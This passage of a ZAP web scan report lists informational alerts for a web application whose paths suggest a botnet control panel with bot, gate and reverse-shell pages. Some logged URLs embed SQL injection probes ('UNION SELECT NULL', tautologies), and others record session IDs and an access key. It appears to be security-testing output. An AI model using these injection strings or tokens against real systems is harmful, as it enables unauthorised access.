Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
Instances 44
Solution
Ensure that Sec-Fetch-User header is included in user initiated requests.
Reference https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Sec-Fetch-User
Tags WSTG-v42-SESS-05
CWE Id 352
WASC Id 9
Plugin Id 90005
Informational
Session Management Response Identified
Description
The given response has been identified as containing a session management token. The 'Other Info' field contains a set of header tokens that can be used in the Header Based Session Management Method. If the request is in a context which has a Session Management Method set to "Auto-Detect" then this rule will change the session management to use the tokens identified.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter PHPSESSID
Attack
Evidence d4jh6b56s7qrf75eg0mrmjoo8f
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter PHPSESSID
Attack
Evidence ohcrer01tp4qgr8qv9sbq0443d
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter PHPSESSID
Attack
Evidence 099m8nt9c49pui810ihliqu6i3
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter PHPSESSID
Attack
Evidence na7rti1i9k5223j81gbggbmjb9
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter PHPSESSID
Attack
Evidence cm7o4rgkcr1ohkcen7a814qgg5
Request Header - size: 193 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter PHPSESSID
Attack
Evidence dkpnmg9utaojnfe1ldtfiib0c3
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter PHPSESSID
Attack
Evidence gdqjteopg1n2q0m9f4dlhroc54
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter PHPSESSID
Attack
Evidence 35kj2pup1e5dd1pbmuuc5b7iuo
Request Header - size: 207 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter PHPSESSID
Attack
Evidence ntoh03s1e4o42g0eqeaf611luj
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter PHPSESSID
Attack
Evidence j1m378vmaoo5kcecq6g2711m8v
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter PHPSESSID
Attack
Evidence jg6sb3eaflgc4juth0h6gs7nke
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 1,015 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence 61chtgv8v44nsmqjm243hs5isb
Request Header - size: 808 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence 8fl4375vlgl6o8opivodnvl321
Request Header - size: 808 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence qfs9pm42g0ntl27inedu6hegm2
Request Header - size: 808 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 694 bytes.
Request Body - size: 0 bytes.
Response Header - size: 311 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 767 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 566 bytes.
Request Body - size: 0 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter PHPSESSID
Attack
Evidence qfs9pm42g0ntl27inedu6hegm2
Request Header - size: 454 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 721 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 664 bytes.
Request Body - size: 0 bytes.
Response Header - size: 364 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter PHPSESSID
Attack
Evidence qfs9pm42g0ntl27inedu6hegm2
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 389 bytes.
Response Body - size: 131 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 724 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter PHPSESSID
Attack
Evidence qfs9pm42g0ntl27inedu6hegm2
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27
Method GET
Parameter PHPSESSID
Attack
Evidence qfs9pm42g0ntl27inedu6hegm2
Request Header - size: 468 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter PHPSESSID
Attack
Evidence 35kj2pup1e5dd1pbmuuc5b7iuo
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence 35kj2pup1e5dd1pbmuuc5b7iuo
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence ohcrer01tp4qgr8qv9sbq0443d
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 1,061 bytes.
Request Body - size: 138 bytes.
Response Header - size: 253 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 855 bytes.
Request Body - size: 138 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter PHPSESSID
Attack
Evidence qfs9pm42g0ntl27inedu6hegm2
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
Instances 33
Solution
This is an informational alert rather than a vulnerability and so there is nothing to fix.
Reference https://www.zaproxy.org/docs/desktop/addons/authentication-helper/session-mgmt-id
Tags
CWE Id
WASC Id
Plugin Id 10112
Informational
Storable and Cacheable Content
Description
The response contents are storable by caching components such as proxy servers, and may be retrieved directly from the cache, rather than from the origin server by the caching servers, in response to similar requests from other users. If the response data is sensitive, personal or user-specific, this may result in sensitive information being leaked. In some cases, this may even result in a user gaining complete control of the session of another user, depending on the configuration of the caching components in use in their environment. This is primarily an issue where "shared" caching servers such as "proxy" caches are configured on the local network. This configuration is typically found in corporate or educational environments, for instance.
URL http://142.202.242.172
Method GET
Parameter
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter
Attack
Evidence
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter
Attack
Evidence
Request Header - size: 152 bytes.
Request Body - size: 0 bytes.
Response Header - size: 275 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter
Attack
Evidence
Request Header - size: 566 bytes.
Request Body - size: 0 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 259 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter
Attack
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
Instances 30
Solution
Validate that the response does not contain sensitive, personal or user-specific information. If it does, consider the use of the following HTTP response headers, to limit, or prevent the content being stored and retrieved from the cache by another user:

Cache-Control: no-cache, no-store, must-revalidate, private

Pragma: no-cache

Expires: 0

This configuration directs both HTTP 1.0 and HTTP 1.1 compliant caching servers to not store the response, and to not retrieve the response (without validation) from the cache, in response to a similar request.
Reference https://datatracker.ietf.org/doc/html/rfc7234
https://datatracker.ietf.org/doc/html/rfc7231
https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html
Tags WSTG-v42-ATHN-06
CWE Id 524
WASC Id 13
Plugin Id 10049
Informational
User Agent Fuzzer
Description
Check for differences in response based on a fuzzed User-Agent (e.g. mobile sites, access as a Search Engine Crawler). Compares the response status code and the hash code of the response body with the original response.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 221 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
